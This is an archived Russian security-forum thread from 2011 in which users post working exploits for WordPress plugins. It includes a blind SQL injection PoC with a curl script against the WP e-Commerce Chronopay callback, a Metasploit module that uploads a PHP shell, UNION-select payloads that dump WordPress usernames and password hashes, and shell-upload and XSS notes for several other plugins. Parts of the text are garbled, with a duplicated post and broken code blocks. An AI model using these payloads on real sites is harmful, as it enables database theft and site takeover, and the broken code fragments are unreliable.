ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.09.2011, 18:15
|
|
Постоянный
Регистрация: 02.11.2009
Сообщений: 341
Провел на форуме:
599124
Репутация:
65
|
|
[B]WordPress WP e-Commerce plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11 2))),0)%23&cs3=123f7bcd4ba53fade05886a7e77bf045&tr ansaction_type=rebill
e.g.
#!/bin/bash
payload="-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,10 9,97,112))),0)#"
hash=`echo -n $payload | md5sum | tr -d '\n' | sed 's/\s*-\s*//g' | md5sum | tr -d '\n' | sed 's/\s*-\s*//g'`
curl --data "cs2=chronopay&cs1=$payload&cs3=$hash&transaction_ type=rebill" http://www.site.com/?chronopay_callback=true
---------------
Vulnerable code
---------------
./wp-e-commerce/wp-shopping-cart.php:
class WP_eCommerce {
function WP_eCommerce() {
add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
}
function init() {
...
$this->load();
...
}
function load() {
...
wpsc_core_load_gateways();
...
}
...
$wpec = new WP_eCommerce();
./wp-e-commerce/wpsc-core/wpsc-functions.php:
function wpsc_core_load_gateways() {
global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
$gateway_directory = WPSC_FILE_PATH . '/wpsc-merchants';
$nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
$num = 0;
foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
}
./wp-e-commerce/wpsc-merchants/chronopay.php:
function nzshpcrt_chronopay_callback()
{
...
if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
{
$salt = get_option('chronopay_salt');
// - this is by default '' and set only if explicitly stated
// inside Store Settings->Payments->General Settings->
// Chronopay->Edit->Security Key
// - problem is that there are more popular payment gateways enlisted (e.g.
// Google Checkout and PayPal) and if that setting is not explicitly set
// it wide opens the door to the potential attacker
$gen_hash = md5($salt . md5($_POST['cs1'] . $salt));
if($gen_hash == $_POST['cs3'])
{
...
$sessionid = trim(stripslashes($_POST['cs1']));
$transaction_id = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
switch($verification_data['trans_type'])
{
...
case 'rebill':
$wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET
`processed` = '2',
`transactid` = '".$transaction_id."',
`date` = '".time()."'
WHERE `sessionid` = ".$sessionid." LIMIT 1");
...
add_action('init', 'nzshpcrt_chronopay_callback');
[/QUOTE]
" if author else f"
---------------
PoC (POST data)
---------------
http://www.сайт.com/?chronopay_callback=true
cs2=chronopay&cs1=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,10 9,97,112))),0)%23&cs3=123f7bcd4ba53fade05886a7e77b f045&transaction_type=rebill
e.g.
#!/bin/bash
payload="-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,10 9,97,112))),0)#"
hash=`echo -n $payload | md5sum | tr -d '\n' | sed 's/\s*-\s*//g' | md5sum | tr -d '\n' | sed 's/\s*-\s*//g'`
curl --data "cs2=chronopay&cs1=$payload&cs3=$hash&transaction_ type=rebill" http://www.site.com/?chronopay_callback=true
---------------
Vulnerable code
---------------
./wp-e-commerce/wp-shopping-cart.php:
class WP_eCommerce {
function WP_eCommerce() {
add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
}
function init() {
...
$this->load();
...
}
function load() {
...
wpsc_core_load_gateways();
...
}
...
$wpec = new WP_eCommerce();
./wp-e-commerce/wpsc-core/wpsc-functions.php:
function wpsc_core_load_gateways() {
global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
$gateway_directory = WPSC_FILE_PATH . '/wpsc-merchants';
$nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
$num = 0;
foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
}
./wp-e-commerce/wpsc-merchants/chronopay.php:
function nzshpcrt_chronopay_callback()
{
...
if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
{
$salt = get_option('chronopay_salt');
// - this is by default '' and set only if explicitly stated
// inside Store Settings->Payments->General Settings->
// Chronopay->Edit->Security Key
// - problem is that there are more popular payment gateways enlisted (e.g.
// Google Checkout and PayPal) and if that setting is not explicitly set
// it wide opens the door to the potential attacker
$gen_hash = md5($salt . md5($_POST['cs1'] . $salt));
if($gen_hash == $_POST['cs3'])
{
...
$sessionid = trim(stripslashes($_POST['cs1']));
$transaction_id = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
switch($verification_data['trans_type'])
{
...
case 'rebill':
$wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET
`processed` = '2',
`transactid` = '".$transaction_id."',
`date` = '".time()."'
WHERE `sessionid` = ".$sessionid." LIMIT 1");
...
add_action('init', 'nzshpcrt_chronopay_callback');
|
|
|
18.09.2011, 18:17
|
|
Постоянный
Регистрация: 02.11.2009
Сообщений: 341
Провел на форуме:
599124
Репутация:
65
|
|
Wordpress 1 Flash Gallery Plugin Arbiraty File Upload Exploit (MSF)
Сообщение от None
# # Поиск в гугле: inurl:"wp-content/plugins/1-flash-gallery"
require 'msf/core'
class Metasploit3 '1 Flash Gallery Wordpress Plugin File Upload Exploit',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in
the '1 Flash Gallery' Wordpress plugin.
},
'Author' => [ 'Ben Schmidt'],
'License' => MSF_LICENSE,
'References' => ["http://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/" ],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as an HTTP
# POST request, so it's possible this might be smaller (maybe?)
# but very unlikely.
'Space' => 262144, # 256k
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sept 6, 2011'
))
register_options([
OptString.new('URI', [true, "Path to Wordpress", "/"]),
], self.class)
end
def exploit
boundary = rand_text_alphanumeric(6)
fn = rand_text_alphanumeric(8)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; "
data datastore['URI'] + "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
}
}, 25)
if (res)
print_status("Successfully uploaded shell.")
shell_path = res.body.split("_")[0]
print_status("Trying to access shell at #{shell_path}...")
res = send_request_raw({
'uri' => datastore['URI'] + shell_path,
'method' => 'GET',
}, 0.01)
else
print_error("Error uploading shell")
end
handler
end
end
|
|
|
|
27.09.2011, 19:53
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131
Репутация:
74
|
|
Ребят, подскажите, есть ли актуальный сканер плагинов вп, который позволял бы узнать, какие плагины установлены?
|
|
|
|
27.09.2011, 19:58
|
|
Познающий
Регистрация: 03.02.2009
Сообщений: 49
Провел на форуме:
3317712
Репутация:
403
|
|
fl00der/thread291666.html
|
|
|
|
29.09.2011, 23:47
|
|
Новичок
Регистрация: 14.08.2005
Сообщений: 1
Провел на форуме:
339
Репутация:
0
|
|
Подскажите хорошую статью по уснановке WP на IIS 7
|
|
|
|
30.09.2011, 19:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
easy-color-manager #plugin# shell upload
easy-color-manager.php
PHP код:
PHP:
[COLOR="#000000"]...
[COLOR="#0000BB"]
[/COLOR]
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"]) as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]){
if([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]] ===[/COLOR][COLOR="#DD0000"]'navigation-02'[/COLOR][COLOR="#007700"]){
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' 背景'[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' パネル'[/COLOR][COLOR="#007700"];
} else {
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] ;
}
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[COLOR="#0000BB"]
[/COLOR][/COLOR]" />
表示方法の設定は「背景画像オプション」、削除は「サイトの詳細設定」でおこなってください。
...[/COLOR]
shell:
Код:
Code:
http://wp/wp-content/plugins/easycolmanager/uploads/shell.php
glossy #plugin# sql-inj
glossy.admin.addEntry.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_name'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryTitle[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_title'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryLink[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_link'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryDimensions[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_dimensions'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryContents[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_contents'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$saveEntry[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]gs_save_entry[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryTitle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryLink[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryDimensions[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryContents[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pageAction[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryOriginalName[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// If $saveEntry is empty (no errors) and we've been adding, switch to editing mode
[/COLOR][COLOR="#007700"]if (empty([/COLOR][COLOR="#0000BB"]$saveEntry[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$completedAction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$pageAction[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$pageAction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Edit"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$entryOriginalName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"];
}
...[/COLOR][/COLOR]
glossy.admin.addEntry.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
} else if ([/COLOR][COLOR="#0000BB"]$entryAction[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"Add"[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$entryOriginalName[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]prepare[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT gs_name FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$gs_tableName[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE gs_name = '%s';"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$existingName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$existingName[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$saveData[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$errorFields[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'entryName'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'taken'[/COLOR][COLOR="#007700"];
}
}
...[/COLOR][/COLOR]
exploit:
Код:
Code:
POST: wp-content/plugins/glossy/glossy.admin.addEntry.php
data: gs_entry_title=&gs_entry_link=&gs_entry_dimensions=&gs_entry_contents=&gs_entry_name=aaa+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+
google-button-wp #plugin# passive XSS
google.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#DD0000"]'.__("General options", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Active share buttons", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]';
foreach ($active_buttons as $name => $text) {
$checked = ($option['[/COLOR][COLOR="#0000BB"]active_buttons[/COLOR][COLOR="#DD0000"]'][$name]) ? '[/COLOR][COLOR="#0000BB"]checked[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"checked"' : '';
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'
. __($text, '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#DD0000"]';
}
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Show buttons in these pages", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]';
foreach ($show_in as $name => $text) {
$checked = ($option['[/COLOR][COLOR="#0000BB"]show_in[/COLOR][COLOR="#DD0000"]'][$name]) ? '[/COLOR][COLOR="#0000BB"]checked[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"checked"' : '';
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'
. __($text, '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#DD0000"]';
}
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Position", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]before the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]after the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]before[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]after the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Google +1 options", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Button width", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]px[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("default: 90", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Show counter", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
...[/COLOR][/COLOR]
Vurnel input name "px" ex:alert()
polylang #plugin# double sql-inj
languages-form.php
PHP код:
PHP:
[COLOR="#000000"]...
[COLOR="#0000BB"]
[/COLOR]
[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" />[COLOR="#0000BB"]
[/COLOR] [COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" aria-required="true" />
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]description[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" aria-required="true" />
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" />
[COLOR="#0000BB"][/COLOR]
...[/COLOR]
admin.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#FF8000"]// Update links to this language in posts and terms in case the slug has been modified
[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_language[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$old_slug[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$old_slug[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'slug'[/COLOR][COLOR="#007700"]]) {
[/COLOR][COLOR="#FF8000"]// update the language slug in posts meta
[/COLOR][COLOR="#007700"]...[/COLOR][/COLOR]
exploit #1:
Код:
Code:
POST: wp-contents/plugins/polylang/admin.php
data: lang=albanskiy&slug=newnew&set=1+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+&time=now
uninstall.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$languages[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_terms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'hide_empty'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]));
foreach ([/COLOR][COLOR="#0000BB"]$languages[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]// delete references to this language in all posts
[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]'numberposts'[/COLOR][COLOR="#007700"]=> -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'post_type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'any'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'post_status'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'any'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$posts[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_posts[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]);
foreach ([/COLOR][COLOR="#0000BB"]$posts[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$post[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]delete_post_meta[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$post[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ID[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_lang-'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// delete references to this language in categories & post tags
[/COLOR][COLOR="#0000BB"]$terms[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_terms[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'post_tag'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'get=all'[/COLOR][COLOR="#007700"]);
foreach ([/COLOR][COLOR="#0000BB"]$terms[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$term[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]delete_metadata[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'term'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$term[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_language'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]delete_metadata[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'term'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$term[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_lang-'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// finally delete the language itself
[/COLOR][COLOR="#0000BB"]wp_delete_term[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// delete the termmeta table only if it is empty as other plugins may use it
[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]termmeta[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT COUNT(*) FROM[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"]WHERE poly_id=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id']"[/COLOR][COLOR="#007700"]);
if (![/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DROP TABLE[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"];"[/COLOR][COLOR="#007700"]);
unset([/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]termmeta[/COLOR][COLOR="#007700"]);
}
...[/COLOR][/COLOR]
exploit #2:
Код:
Code:
